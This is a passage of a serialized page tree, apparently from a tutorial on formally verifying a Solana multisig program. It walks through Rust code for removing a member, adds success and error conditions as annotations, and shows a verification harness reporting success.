",{"type":24,"tag":145,"props":32205,"children":32207},{"className":32206},[],[32208],{"type":30,"value":26925},{"type":30,"value":2378},{"type":24,"tag":145,"props":32211,"children":32213},{"className":32212},[],[32214],{"type":30,"value":28547},{"type":30,"value":32216}," let's take a look at the ",{"type":24,"tag":145,"props":32218,"children":32220},{"className":32219},[],[32221],{"type":30,"value":32222},"remove_member",{"type":30,"value":32224}," function:",{"type":24,"tag":291,"props":32226,"children":32228},{"code":32227,"language":9817,"meta":7,"className":9818,"style":7},"#[derive(Accounts, Debug)]\npub struct MsAuth\u003C'info> {\n #[account(mut)]\n multisig: Box\u003CAccount\u003C'info, Ms>>,\n #[account(\n mut,\n seeds = [\n b\"squad\",\n multisig.create_key.as_ref(),\n b\"multisig\"\n ], bump = multisig.bump\n )]\n pub multisig_auth: Signer\u003C'info>,\n}\n\npub fn remove_member(ctx: Context\u003CMsAuth>, old_member: Pubkey) -> Result\u003C()> {\n // if there is only one key in this multisig, reject the removal\n if ctx.accounts.multisig.keys.len() == 1 {\n return err!(MsError::CannotRemoveSoloMember);\n }\n ctx.accounts.multisig.remove_member(old_member)?;\n\n // if the number of keys is now less than the threshold, adjust it\n if ctx.accounts.multisig.keys.len() \u003C usize::from(ctx.accounts.multisig.threshold) {\n let new_threshold: u16 = ctx.accounts.multisig.keys.len().try_into().unwrap();\n ctx.accounts.multisig.change_threshold(new_threshold)?;\n }\n let new_index = ctx.accounts.multisig.transaction_index;\n ctx.accounts.multisig.set_change_index(new_index)\n}\n",[32229],{"type":24,"tag":145,"props":32230,"children":32231},{"__ignoreMap":7},[32232,32255,32283,32298,32343,32350,32362,32378,32390,32416,32424,32453,32460,32492,32499,32506,32580,32588,32648,32680,32687,32738,32745,32753,32846,32935,32989,32996,33041,33086],{"type":24,"tag":301,"props":32233,"children":32234},{"class":303,"line":304},[32235,32239,32243,32247,32251],{"type":24,"tag":301,"props":32236,"children":32237},{"style":359},[32238],{"type":30,"value":29605},{"type":24,"tag":301,"props":32240,"children":32241},{"style":10246},[32242],{"type":30,"value":29610},{"type":24,"tag":301,"props":32244,"children":32245},{"style":359},[32246],{"type":30,"value":377},{"type":24,"tag":301,"props":32248,"children":32249},{"style":10246},[32250],{"type":30,"value":31466},{"type":24,"tag":301,"props":32252,"children":32253},{"style":359},[32254],{"type":30,"value":27029},{"type":24,"tag":301,"props":32256,"children":32257},{"class":303,"line":320},[32258,32262,32266,32271,32275,32279],{"type":24,"tag":301,"props":32259,"children":32260},{"style":348},[32261],{"type":30,"value":20484},{"type":24,"tag":301,"props":32263,"children":32264},{"style":348},[32265],{"type":30,"value":27920},{"type":24,"tag":301,"props":32267,"children":32268},{"style":10246},[32269],{"type":30,"value":32270}," MsAuth",{"type":24,"tag":301,"props":32272,"children":32273},{"style":359},[32274],{"type":30,"value":29690},{"type":24,"tag":301,"props":32276,"children":32277},{"style":10246},[32278],{"type":30,"value":29695},{"type":24,"tag":301,"props":32280,"children":32281},{"style":359},[32282],{"type":30,"value":14097},{"type":24,"tag":301,"props":32284,"children":32285},{"class":303,"line":335},[32286,32290,32294],{"type":24,"tag":301,"props":32287,"children":32288},{"style":359},[32289],{"type":30,"value":29896},{"type":24,"tag":301,"props":32291,"children":32292},{"style":348},[32293],{"type":30,"value":10550},{"type":24,"tag":301,"props":32295,"children":32296},{"style":359},[32297],{"type":30,"value":27029},{"type":24,"tag":301,"props":32299,"children":32300},{"class":303,"line":344},[32301,32306,32310,32315,32319,32323,32327,32331,32335,32339],{"type":24,"tag":301,"props":32302,"children":32303},{"style":369},[32304],{"type":30,"value":32305}," multisig",{"type":24,"tag":301,"props":32307,"children":32308},{"style":385},[32309],{"type":30,"value":1679},{"type":24,"tag":301,"props":32311,"children":32312},{"style":10246},[32313],{"type":30,"value":32314}," Box",{"type":24,"tag":301,"props":32316,"children":32317},{"style":359},[32318],{"type":30,"value":1849},{"type":24,"tag":301,"props":32320,"children":32321},{"style":10246},[32322],{"type":30,"value":23926},{"type":24,"tag":301,"props":32324,"children":32325},{"style":359},[32326],{"type":30,"value":29690},{"type":24,"tag":301,"props":32328,"children":32329},{"style":10246},[32330],{"type":30,"value":29695},{"type":24,"tag":301,"props":32332,"children":32333},{"style":359},[32334],{"type":30,"value":377},{"type":24,"tag":301,"props":32336,"children":32337},{"style":10246},[32338],{"type":30,"value":29509},{"type":24,"tag":301,"props":32340,"children":32341},{"style":359},[32342],{"type":30,"value":13769},{"type":24,"tag":301,"props":32344,"children":32345},{"class":303,"line":401},[32346],{"type":24,"tag":301,"props":32347,"children":32348},{"style":359},[32349],{"type":30,"value":29707},{"type":24,"tag":301,"props":32351,"children":32352},{"class":303,"line":415},[32353,32358],{"type":24,"tag":301,"props":32354,"children":32355},{"style":348},[32356],{"type":30,"value":32357}," mut",{"type":24,"tag":301,"props":32359,"children":32360},{"style":359},[32361],{"type":30,"value":1729},{"type":24,"tag":301,"props":32363,"children":32364},{"class":303,"line":439},[32365,32369,32373],{"type":24,"tag":301,"props":32366,"children":32367},{"style":359},[32368],{"type":30,"value":29791},{"type":24,"tag":301,"props":32370,"children":32371},{"style":385},[32372],{"type":30,"value":523},{"type":24,"tag":301,"props":32374,"children":32375},{"style":359},[32376],{"type":30,"value":32377}," [\n",{"type":24,"tag":301,"props":32379,"children":32380},{"class":303,"line":447},[32381,32386],{"type":24,"tag":301,"props":32382,"children":32383},{"style":329},[32384],{"type":30,"value":32385}," b\"squad\"",{"type":24,"tag":301,"props":32387,"children":32388},{"style":359},[32389],{"type":30,"value":1729},{"type":24,"tag":301,"props":32391,"children":32392},{"class":303,"line":476},[32393,32398,32402,32407,32411],{"type":24,"tag":301,"props":32394,"children":32395},{"style":359},[32396],{"type":30,"value":32397}," multisig",{"type":24,"tag":301,"props":32399,"children":32400},{"style":385},[32401],{"type":30,"value":206},{"type":24,"tag":301,"props":32403,"children":32404},{"style":359},[32405],{"type":30,"value":32406},"create_key",{"type":24,"tag":301,"props":32408,"children":32409},{"style":385},[32410],{"type":30,"value":206},{"type":24,"tag":301,"props":32412,"children":32413},{"style":359},[32414],{"type":30,"value":32415},"as_ref(),\n",{"type":24,"tag":301,"props":32417,"children":32418},{"class":303,"line":495},[32419],{"type":24,"tag":301,"props":32420,"children":32421},{"style":329},[32422],{"type":30,"value":32423}," b\"multisig\"\n",{"type":24,"tag":301,"props":32425,"children":32426},{"class":303,"line":504},[32427,32432,32437,32441,32445,32449],{"type":24,"tag":301,"props":32428,"children":32429},{"style":359},[32430],{"type":30,"value":32431}," ], ",{"type":24,"tag":301,"props":32433,"children":32434},{"style":369},[32435],{"type":30,"value":32436},"bump",{"type":24,"tag":301,"props":32438,"children":32439},{"style":385},[32440],{"type":30,"value":2537},{"type":24,"tag":301,"props":32442,"children":32443},{"style":369},[32444],{"type":30,"value":29852},{"type":24,"tag":301,"props":32446,"children":32447},{"style":385},[32448],{"type":30,"value":206},{"type":24,"tag":301,"props":32450,"children":32451},{"style":359},[32452],{"type":30,"value":29832},{"type":24,"tag":301,"props":32454,"children":32455},{"class":303,"line":512},[32456],{"type":24,"tag":301,"props":32457,"children":32458},{"style":359},[32459],{"type":30,"value":29840},{"type":24,"tag":301,"props":32461,"children":32462},{"class":303,"line":592},[32463,32467,32472,32476,32480,32484,32488],{"type":24,"tag":301,"props":32464,"children":32465},{"style":348},[32466],{"type":30,"value":27612},{"type":24,"tag":301,"props":32468,"children":32469},{"style":369},[32470],{"type":30,"value":32471}," multisig_auth",{"type":24,"tag":301,"props":32473,"children":32474},{"style":385},[32475],{"type":30,"value":1679},{"type":24,"tag":301,"props":32477,"children":32478},{"style":10246},[32479],{"type":30,"value":29925},{"type":24,"tag":301,"props":32481,"children":32482},{"style":359},[32483],{"type":30,"value":29690},{"type":24,"tag":301,"props":32485,"children":32486},{"style":10246},[32487],{"type":30,"value":29695},{"type":24,"tag":301,"props":32489,"children":32490},{"style":359},[32491],{"type":30,"value":12957},{"type":24,"tag":301,"props":32493,"children":32494},{"class":303,"line":619},[32495],{"type":24,"tag":301,"props":32496,"children":32497},{"style":359},[32498],{"type":30,"value":698},{"type":24,"tag":301,"props":32500,"children":32501},{"class":303,"line":635},[32502],{"type":24,"tag":301,"props":32503,"children":32504},{"emptyLinePlaceholder":16},[32505],{"type":30,"value":341},{"type":24,"tag":301,"props":32507,"children":32508},{"class":303,"line":643},[32509,32513,32517,32522,32526,32530,32534,32538,32542,32547,32551,32556,32560,32564,32568,32572,32576],{"type":24,"tag":301,"props":32510,"children":32511},{"style":348},[32512],{"type":30,"value":20484},{"type":24,"tag":301,"props":32514,"children":32515},{"style":348},[32516],{"type":30,"value":20489},{"type":24,"tag":301,"props":32518,"children":32519},{"style":314},[32520],{"type":30,"value":32521}," remove_member",{"type":24,"tag":301,"props":32523,"children":32524},{"style":359},[32525],{"type":30,"value":362},{"type":24,"tag":301,"props":32527,"children":32528},{"style":369},[32529],{"type":30,"value":27051},{"type":24,"tag":301,"props":32531,"children":32532},{"style":385},[32533],{"type":30,"value":1679},{"type":24,"tag":301,"props":32535,"children":32536},{"style":10246},[32537],{"type":30,"value":27060},{"type":24,"tag":301,"props":32539,"children":32540},{"style":359},[32541],{"type":30,"value":1849},{"type":24,"tag":301,"props":32543,"children":32544},{"style":10246},[32545],{"type":30,"value":32546},"MsAuth",{"type":24,"tag":301,"props":32548,"children":32549},{"style":359},[32550],{"type":30,"value":13449},{"type":24,"tag":301,"props":32552,"children":32553},{"style":369},[32554],{"type":30,"value":32555},"old_member",{"type":24,"tag":301,"props":32557,"children":32558},{"style":385},[32559],{"type":30,"value":1679},{"type":24,"tag":301,"props":32561,"children":32562},{"style":10246},[32563],{"type":30,"value":27626},{"type":24,"tag":301,"props":32565,"children":32566},{"style":359},[32567],{"type":30,"value":911},{"type":24,"tag":301,"props":32569,"children":32570},{"style":385},[32571],{"type":30,"value":882},{"type":24,"tag":301,"props":32573,"children":32574},{"style":10246},[32575],{"type":30,"value":20555},{"type":24,"tag":301,"props":32577,"children":32578},{"style":359},[32579],{"type":30,"value":27102},{"type":24,"tag":301,"props":32581,"children":32582},{"class":303,"line":652},[32583],{"type":24,"tag":301,"props":32584,"children":32585},{"style":1062},[32586],{"type":30,"value":32587}," // if there is only one key in this multisig, reject the removal\n",{"type":24,"tag":301,"props":32589,"children":32590},{"class":303,"line":666},[32591,32595,32600,32604,32608,32612,32616,32620,32624,32628,32632,32636,32640,32644],{"type":24,"tag":301,"props":32592,"children":32593},{"style":308},[32594],{"type":30,"value":453},{"type":24,"tag":301,"props":32596,"children":32597},{"style":369},[32598],{"type":30,"value":32599}," ctx",{"type":24,"tag":301,"props":32601,"children":32602},{"style":385},[32603],{"type":30,"value":206},{"type":24,"tag":301,"props":32605,"children":32606},{"style":359},[32607],{"type":30,"value":21467},{"type":24,"tag":301,"props":32609,"children":32610},{"style":385},[32611],{"type":30,"value":206},{"type":24,"tag":301,"props":32613,"children":32614},{"style":359},[32615],{"type":30,"value":30568},{"type":24,"tag":301,"props":32617,"children":32618},{"style":385},[32619],{"type":30,"value":206},{"type":24,"tag":301,"props":32621,"children":32622},{"style":359},[32623],{"type":30,"value":27752},{"type":24,"tag":301,"props":32625,"children":32626},{"style":385},[32627],{"type":30,"value":206},{"type":24,"tag":301,"props":32629,"children":32630},{"style":314},[32631],{"type":30,"value":6156},{"type":24,"tag":301,"props":32633,"children":32634},{"style":359},[32635],{"type":30,"value":20835},{"type":24,"tag":301,"props":32637,"children":32638},{"style":385},[32639],{"type":30,"value":607},{"type":24,"tag":301,"props":32641,"children":32642},{"style":466},[32643],{"type":30,"value":487},{"type":24,"tag":301,"props":32645,"children":32646},{"style":359},[32647],{"type":30,"value":3035},{"type":24,"tag":301,"props":32649,"children":32650},{"class":303,"line":674},[32651,32655,32659,32663,32667,32671,32676],{"type":24,"tag":301,"props":32652,"children":32653},{"style":308},[32654],{"type":30,"value":482},{"type":24,"tag":301,"props":32656,"children":32657},{"style":314},[32658],{"type":30,"value":30285},{"type":24,"tag":301,"props":32660,"children":32661},{"style":359},[32662],{"type":30,"value":362},{"type":24,"tag":301,"props":32664,"children":32665},{"style":10246},[32666],{"type":30,"value":30294},{"type":24,"tag":301,"props":32668,"children":32669},{"style":385},[32670],{"type":30,"value":10308},{"type":24,"tag":301,"props":32672,"children":32673},{"style":10246},[32674],{"type":30,"value":32675},"CannotRemoveSoloMember",{"type":24,"tag":301,"props":32677,"children":32678},{"style":359},[32679],{"type":30,"value":589},{"type":24,"tag":301,"props":32681,"children":32682},{"class":303,"line":692},[32683],{"type":24,"tag":301,"props":32684,"children":32685},{"style":359},[32686],{"type":30,"value":501},{"type":24,"tag":301,"props":32688,"children":32689},{"class":303,"line":3631},[32690,32694,32698,32702,32706,32710,32714,32718,32722,32726,32730,32734],{"type":24,"tag":301,"props":32691,"children":32692},{"style":369},[32693],{"type":30,"value":26994},{"type":24,"tag":301,"props":32695,"children":32696},{"style":385},[32697],{"type":30,"value":206},{"type":24,"tag":301,"props":32699,"children":32700},{"style":359},[32701],{"type":30,"value":21467},{"type":24,"tag":301,"props":32703,"children":32704},{"style":385},[32705],{"type":30,"value":206},{"type":24,"tag":301,"props":32707,"children":32708},{"style":359},[32709],{"type":30,"value":30568},{"type":24,"tag":301,"props":32711,"children":32712},{"style":385},[32713],{"type":30,"value":206},{"type":24,"tag":301,"props":32715,"children":32716},{"style":314},[32717],{"type":30,"value":32222},{"type":24,"tag":301,"props":32719,"children":32720},{"style":359},[32721],{"type":30,"value":362},{"type":24,"tag":301,"props":32723,"children":32724},{"style":369},[32725],{"type":30,"value":32555},{"type":24,"tag":301,"props":32727,"children":32728},{"style":359},[32729],{"type":30,"value":9961},{"type":24,"tag":301,"props":32731,"children":32732},{"style":385},[32733],{"type":30,"value":2003},{"type":24,"tag":301,"props":32735,"children":32736},{"style":359},[32737],{"type":30,"value":492},{"type":24,"tag":301,"props":32739,"children":32740},{"class":303,"line":3639},[32741],{"type":24,"tag":301,"props":32742,"children":32743},{"emptyLinePlaceholder":16},[32744],{"type":30,"value":341},{"type":24,"tag":301,"props":32746,"children":32747},{"class":303,"line":3647},[32748],{"type":24,"tag":301,"props":32749,"children":32750},{"style":1062},[32751],{"type":30,"value":32752}," // if the number of keys is now less than the threshold, adjust it\n",{"type":24,"tag":301,"props":32754,"children":32755},{"class":303,"line":3685},[32756,32760,32764,32768,32772,32776,32780,32784,32788,32792,32796,32801,32805,32809,32813,32817,32821,32825,32829,32833,32837,32841],{"type":24,"tag":301,"props":32757,"children":32758},{"style":308},[32759],{"type":30,"value":453},{"type":24,"tag":301,"props":32761,"children":32762},{"style":369},[32763],{"type":30,"value":32599},{"type":24,"tag":301,"props":32765,"children":32766},{"style":385},[32767],{"type":30,"value":206},{"type":24,"tag":301,"props":32769,"children":32770},{"style":359},[32771],{"type":30,"value":21467},{"type":24,"tag":301,"props":32773,"children":32774},{"style":385},[32775],{"type":30,"value":206},{"type":24,"tag":301,"props":32777,"children":32778},{"style":359},[32779],{"type":30,"value":30568},{"type":24,"tag":301,"props":32781,"children":32782},{"style":385},[32783],{"type":30,"value":206},{"type":24,"tag":301,"props":32785,"children":32786},{"style":359},[32787],{"type":30,"value":27752},{"type":24,"tag":301,"props":32789,"children":32790},{"style":385},[32791],{"type":30,"value":206},{"type":24,"tag":301,"props":32793,"children":32794},{"style":314},[32795],{"type":30,"value":6156},{"type":24,"tag":301,"props":32797,"children":32798},{"style":359},[32799],{"type":30,"value":32800},"() \u003C ",{"type":24,"tag":301,"props":32802,"children":32803},{"style":10246},[32804],{"type":30,"value":23383},{"type":24,"tag":301,"props":32806,"children":32807},{"style":385},[32808],{"type":30,"value":10308},{"type":24,"tag":301,"props":32810,"children":32811},{"style":314},[32812],{"type":30,"value":26245},{"type":24,"tag":301,"props":32814,"children":32815},{"style":359},[32816],{"type":30,"value":362},{"type":24,"tag":301,"props":32818,"children":32819},{"style":369},[32820],{"type":30,"value":27051},{"type":24,"tag":301,"props":32822,"children":32823},{"style":385},[32824],{"type":30,"value":206},{"type":24,"tag":301,"props":32826,"children":32827},{"style":359},[32828],{"type":30,"value":21467},{"type":24,"tag":301,"props":32830,"children":32831},{"style":385},[32832],{"type":30,"value":206},{"type":24,"tag":301,"props":32834,"children":32835},{"style":359},[32836],{"type":30,"value":30568},{"type":24,"tag":301,"props":32838,"children":32839},{"style":385},[32840],{"type":30,"value":206},{"type":24,"tag":301,"props":32842,"children":32843},{"style":359},[32844],{"type":30,"value":32845},"threshold) {\n",{"type":24,"tag":301,"props":32847,"children":32848},{"class":303,"line":3713},[32849,32853,32858,32862,32866,32870,32874,32878,32882,32886,32890,32894,32898,32902,32906,32910,32914,32919,32923,32927,32931],{"type":24,"tag":301,"props":32850,"children":32851},{"style":348},[32852],{"type":30,"value":9900},{"type":24,"tag":301,"props":32854,"children":32855},{"style":369},[32856],{"type":30,"value":32857}," new_threshold",{"type":24,"tag":301,"props":32859,"children":32860},{"style":385},[32861],{"type":30,"value":1679},{"type":24,"tag":301,"props":32863,"children":32864},{"style":10246},[32865],{"type":30,"value":27799},{"type":24,"tag":301,"props":32867,"children":32868},{"style":385},[32869],{"type":30,"value":2537},{"type":24,"tag":301,"props":32871,"children":32872},{"style":369},[32873],{"type":30,"value":32599},{"type":24,"tag":301,"props":32875,"children":32876},{"style":385},[32877],{"type":30,"value":206},{"type":24,"tag":301,"props":32879,"children":32880},{"style":359},[32881],{"type":30,"value":21467},{"type":24,"tag":301,"props":32883,"children":32884},{"style":385},[32885],{"type":30,"value":206},{"type":24,"tag":301,"props":32887,"children":32888},{"style":359},[32889],{"type":30,"value":30568},{"type":24,"tag":301,"props":32891,"children":32892},{"style":385},[32893],{"type":30,"value":206},{"type":24,"tag":301,"props":32895,"children":32896},{"style":359},[32897],{"type":30,"value":27752},{"type":24,"tag":301,"props":32899,"children":32900},{"style":385},[32901],{"type":30,"value":206},{"type":24,"tag":301,"props":32903,"children":32904},{"style":314},[32905],{"type":30,"value":6156},{"type":24,"tag":301,"props":32907,"children":32908},{"style":359},[32909],{"type":30,"value":20672},{"type":24,"tag":301,"props":32911,"children":32912},{"style":385},[32913],{"type":30,"value":206},{"type":24,"tag":301,"props":32915,"children":32916},{"style":314},[32917],{"type":30,"value":32918},"try_into",{"type":24,"tag":301,"props":32920,"children":32921},{"style":359},[32922],{"type":30,"value":20672},{"type":24,"tag":301,"props":32924,"children":32925},{"style":385},[32926],{"type":30,"value":206},{"type":24,"tag":301,"props":32928,"children":32929},{"style":314},[32930],{"type":30,"value":10492},{"type":24,"tag":301,"props":32932,"children":32933},{"style":359},[32934],{"type":30,"value":4859},{"type":24,"tag":301,"props":32936,"children":32937},{"class":303,"line":3721},[32938,32943,32947,32951,32955,32959,32963,32968,32972,32977,32981,32985],{"type":24,"tag":301,"props":32939,"children":32940},{"style":369},[32941],{"type":30,"value":32942}," ctx",{"type":24,"tag":301,"props":32944,"children":32945},{"style":385},[32946],{"type":30,"value":206},{"type":24,"tag":301,"props":32948,"children":32949},{"style":359},[32950],{"type":30,"value":21467},{"type":24,"tag":301,"props":32952,"children":32953},{"style":385},[32954],{"type":30,"value":206},{"type":24,"tag":301,"props":32956,"children":32957},{"style":359},[32958],{"type":30,"value":30568},{"type":24,"tag":301,"props":32960,"children":32961},{"style":385},[32962],{"type":30,"value":206},{"type":24,"tag":301,"props":32964,"children":32965},{"style":314},[32966],{"type":30,"value":32967},"change_threshold",{"type":24,"tag":301,"props":32969,"children":32970},{"style":359},[32971],{"type":30,"value":362},{"type":24,"tag":301,"props":32973,"children":32974},{"style":369},[32975],{"type":30,"value":32976},"new_threshold",{"type":24,"tag":301,"props":32978,"children":32979},{"style":359},[32980],{"type":30,"value":9961},{"type":24,"tag":301,"props":32982,"children":32983},{"style":385},[32984],{"type":30,"value":2003},{"type":24,"tag":301,"props":32986,"children":32987},{"style":359},[32988],{"type":30,"value":492},{"type":24,"tag":301,"props":32990,"children":32991},{"class":303,"line":3751},[32992],{"type":24,"tag":301,"props":32993,"children":32994},{"style":359},[32995],{"type":30,"value":501},{"type":24,"tag":301,"props":32997,"children":32998},{"class":303,"line":3782},[32999,33003,33008,33012,33016,33020,33024,33028,33032,33036],{"type":24,"tag":301,"props":33000,"children":33001},{"style":348},[33002],{"type":30,"value":9838},{"type":24,"tag":301,"props":33004,"children":33005},{"style":369},[33006],{"type":30,"value":33007}," new_index",{"type":24,"tag":301,"props":33009,"children":33010},{"style":385},[33011],{"type":30,"value":2537},{"type":24,"tag":301,"props":33013,"children":33014},{"style":369},[33015],{"type":30,"value":32599},{"type":24,"tag":301,"props":33017,"children":33018},{"style":385},[33019],{"type":30,"value":206},{"type":24,"tag":301,"props":33021,"children":33022},{"style":359},[33023],{"type":30,"value":21467},{"type":24,"tag":301,"props":33025,"children":33026},{"style":385},[33027],{"type":30,"value":206},{"type":24,"tag":301,"props":33029,"children":33030},{"style":359},[33031],{"type":30,"value":30568},{"type":24,"tag":301,"props":33033,"children":33034},{"style":385},[33035],{"type":30,"value":206},{"type":24,"tag":301,"props":33037,"children":33038},{"style":359},[33039],{"type":30,"value":33040},"transaction_index;\n",{"type":24,"tag":301,"props":33042,"children":33043},{"class":303,"line":3791},[33044,33048,33052,33056,33060,33064,33068,33073,33077,33082],{"type":24,"tag":301,"props":33045,"children":33046},{"style":369},[33047],{"type":30,"value":26994},{"type":24,"tag":301,"props":33049,"children":33050},{"style":385},[33051],{"type":30,"value":206},{"type":24,"tag":301,"props":33053,"children":33054},{"style":359},[33055],{"type":30,"value":21467},{"type":24,"tag":301,"props":33057,"children":33058},{"style":385},[33059],{"type":30,"value":206},{"type":24,"tag":301,"props":33061,"children":33062},{"style":359},[33063],{"type":30,"value":30568},{"type":24,"tag":301,"props":33065,"children":33066},{"style":385},[33067],{"type":30,"value":206},{"type":24,"tag":301,"props":33069,"children":33070},{"style":314},[33071],{"type":30,"value":33072},"set_change_index",{"type":24,"tag":301,"props":33074,"children":33075},{"style":359},[33076],{"type":30,"value":362},{"type":24,"tag":301,"props":33078,"children":33079},{"style":369},[33080],{"type":30,"value":33081},"new_index",{"type":24,"tag":301,"props":33083,"children":33084},{"style":359},[33085],{"type":30,"value":791},{"type":24,"tag":301,"props":33087,"children":33088},{"class":303,"line":3819},[33089],{"type":24,"tag":301,"props":33090,"children":33091},{"style":359},[33092],{"type":30,"value":698},{"type":24,"tag":32,"props":33094,"children":33095},{},[33096,33098,33103],{"type":30,"value":33097},"First let's establish the ",{"type":24,"tag":145,"props":33099,"children":33101},{"className":33100},[],[33102],{"type":30,"value":26925},{"type":30,"value":33104}," condition. We can do this either interactively, following counterexamples like in the first example or we can guess what a sufficient condition might be:",{"type":24,"tag":291,"props":33106,"children":33108},{"code":33107,"language":9817,"meta":7,"className":9818,"style":7},"#[succeeds_if(\n ctx.accounts.multisig.keys.len() > 1\n)]\nfn remove_member(...) { ... }\n",[33109],{"type":24,"tag":145,"props":33110,"children":33111},{"__ignoreMap":7},[33112,33119,33166,33173],{"type":24,"tag":301,"props":33113,"children":33114},{"class":303,"line":304},[33115],{"type":24,"tag":301,"props":33116,"children":33117},{"style":359},[33118],{"type":30,"value":30867},{"type":24,"tag":301,"props":33120,"children":33121},{"class":303,"line":320},[33122,33126,33130,33134,33138,33142,33146,33150,33154,33158,33162],{"type":24,"tag":301,"props":33123,"children":33124},{"style":359},[33125],{"type":30,"value":26994},{"type":24,"tag":301,"props":33127,"children":33128},{"style":385},[33129],{"type":30,"value":206},{"type":24,"tag":301,"props":33131,"children":33132},{"style":359},[33133],{"type":30,"value":21467},{"type":24,"tag":301,"props":33135,"children":33136},{"style":385},[33137],{"type":30,"value":206},{"type":24,"tag":301,"props":33139,"children":33140},{"style":359},[33141],{"type":30,"value":30568},{"type":24,"tag":301,"props":33143,"children":33144},{"style":385},[33145],{"type":30,"value":206},{"type":24,"tag":301,"props":33147,"children":33148},{"style":359},[33149],{"type":30,"value":27752},{"type":24,"tag":301,"props":33151,"children":33152},{"style":385},[33153],{"type":30,"value":206},{"type":24,"tag":301,"props":33155,"children":33156},{"style":359},[33157],{"type":30,"value":27790},{"type":24,"tag":301,"props":33159,"children":33160},{"style":385},[33161],{"type":30,"value":1456},{"type":24,"tag":301,"props":33163,"children":33164},{"style":359},[33165],{"type":30,"value":26216},{"type":24,"tag":301,"props":33167,"children":33168},{"class":303,"line":335},[33169],{"type":24,"tag":301,"props":33170,"children":33171},{"style":359},[33172],{"type":30,"value":27029},{"type":24,"tag":301,"props":33174,"children":33175},{"class":303,"line":344},[33176,33180,33184,33188,33192,33196,33200],{"type":24,"tag":301,"props":33177,"children":33178},{"style":348},[33179],{"type":30,"value":27037},{"type":24,"tag":301,"props":33181,"children":33182},{"style":314},[33183],{"type":30,"value":32521},{"type":24,"tag":301,"props":33185,"children":33186},{"style":359},[33187],{"type":30,"value":362},{"type":24,"tag":301,"props":33189,"children":33190},{"style":385},[33191],{"type":30,"value":4054},{"type":24,"tag":301,"props":33193,"children":33194},{"style":359},[33195],{"type":30,"value":30745},{"type":24,"tag":301,"props":33197,"children":33198},{"style":385},[33199],{"type":30,"value":4054},{"type":24,"tag":301,"props":33201,"children":33202},{"style":359},[33203],{"type":30,"value":16401},{"type":24,"tag":32,"props":33205,"children":33206},{},[33207,33209,33214],{"type":30,"value":33208},"And for now let's remove the invariant on the ",{"type":24,"tag":145,"props":33210,"children":33212},{"className":33211},[],[33213],{"type":30,"value":29509},{"type":30,"value":33215}," account:",{"type":24,"tag":291,"props":33217,"children":33219},{"code":33218,"language":9817,"meta":7,"className":9818,"style":7},"#[invariant()]\npub struct Ms { ... }\n",[33220],{"type":24,"tag":145,"props":33221,"children":33222},{"__ignoreMap":7},[33223,33231],{"type":24,"tag":301,"props":33224,"children":33225},{"class":303,"line":304},[33226],{"type":24,"tag":301,"props":33227,"children":33228},{"style":359},[33229],{"type":30,"value":33230},"#[invariant()]\n",{"type":24,"tag":301,"props":33232,"children":33233},{"class":303,"line":320},[33234,33238,33242,33246,33250,33254],{"type":24,"tag":301,"props":33235,"children":33236},{"style":348},[33237],{"type":30,"value":20484},{"type":24,"tag":301,"props":33239,"children":33240},{"style":348},[33241],{"type":30,"value":27920},{"type":24,"tag":301,"props":33243,"children":33244},{"style":10246},[33245],{"type":30,"value":27925},{"type":24,"tag":301,"props":33247,"children":33248},{"style":359},[33249],{"type":30,"value":16392},{"type":24,"tag":301,"props":33251,"children":33252},{"style":385},[33253],{"type":30,"value":4054},{"type":24,"tag":301,"props":33255,"children":33256},{"style":359},[33257],{"type":30,"value":16401},{"type":24,"tag":32,"props":33259,"children":33260},{},[33261],{"type":30,"value":33262},"Let's test this!",{"type":24,"tag":32,"props":33264,"children":33265},{},[33266,33268,33273],{"type":30,"value":33267},"Our ",{"type":24,"tag":145,"props":33269,"children":33271},{"className":33270},[],[33272],{"type":30,"value":26925},{"type":30,"value":33274}," harness produces:",{"type":24,"tag":291,"props":33276,"children":33278},{"code":33277},"VERIFICATION:- SUCCESSFUL\nVerification Time: 28.119272s\n",[33279],{"type":24,"tag":145,"props":33280,"children":33281},{"__ignoreMap":7},[33282],{"type":30,"value":33277},{"type":24,"tag":32,"props":33284,"children":33285},{},[33286],{"type":30,"value":33287},"This tells us that if our multisig has at least two keys then the instruction will succeed.",{"type":24,"tag":32,"props":33289,"children":33290},{},[33291,33293,33298],{"type":30,"value":33292},"However, remember that since ",{"type":24,"tag":145,"props":33294,"children":33296},{"className":33295},[],[33297],{"type":30,"value":26925},{"type":30,"value":33299}," represents just the sufficient conditions, there may be other cases where the function succeeds.",{"type":24,"tag":32,"props":33301,"children":33302},{},[33303,33305,33310,33312,33317,33319,33324],{"type":30,"value":33304},"Suppose we want to be sure that this condition is the ",{"type":24,"tag":5422,"props":33306,"children":33307},{},[33308],{"type":30,"value":33309},"only condition",{"type":30,"value":33311}," in which the function will succeed (i.e. ",{"type":24,"tag":5422,"props":33313,"children":33314},{},[33315],{"type":30,"value":33316},"\"the function will succeed if and only if the multisig has at least two keys\"",{"type":30,"value":33318},"). We could attempt to verify the other side of this with an ",{"type":24,"tag":145,"props":33320,"children":33322},{"className":33321},[],[33323],{"type":30,"value":26932},{"type":30,"value":33325}," macro such as:",{"type":24,"tag":291,"props":33327,"children":33329},{"code":33328,"language":9817,"meta":7,"className":9818,"style":7},"#[succeeds_if(\n ctx.accounts.multisig.keys.len() > 1\n)]\n#[errors_if(\n ctx.accounts.multisig.keys.len() \u003C= 1\n)]\nfn remove_member(...) { ... }\n",[33330],{"type":24,"tag":145,"props":33331,"children":33332},{"__ignoreMap":7},[33333,33340,33387,33394,33401,33448,33455],{"type":24,"tag":301,"props":33334,"children":33335},{"class":303,"line":304},[33336],{"type":24,"tag":301,"props":33337,"children":33338},{"style":359},[33339],{"type":30,"value":30867},{"type":24,"tag":301,"props":33341,"children":33342},{"class":303,"line":320},[33343,33347,33351,33355,33359,33363,33367,33371,33375,33379,33383],{"type":24,"tag":301,"props":33344,"children":33345},{"style":359},[33346],{"type":30,"value":26994},{"type":24,"tag":301,"props":33348,"children":33349},{"style":385},[33350],{"type":30,"value":206},{"type":24,"tag":301,"props":33352,"children":33353},{"style":359},[33354],{"type":30,"value":21467},{"type":24,"tag":301,"props":33356,"children":33357},{"style":385},[33358],{"type":30,"value":206},{"type":24,"tag":301,"props":33360,"children":33361},{"style":359},[33362],{"type":30,"value":30568},{"type":24,"tag":301,"props":33364,"children":33365},{"style":385},[33366],{"type":30,"value":206},{"type":24,"tag":301,"props":33368,"children":33369},{"style":359},[33370],{"type":30,"value":27752},{"type":24,"tag":301,"props":33372,"children":33373},{"style":385},[33374],{"type":30,"value":206},{"type":24,"tag":301,"props":33376,"children":33377},{"style":359},[33378],{"type":30,"value":27790}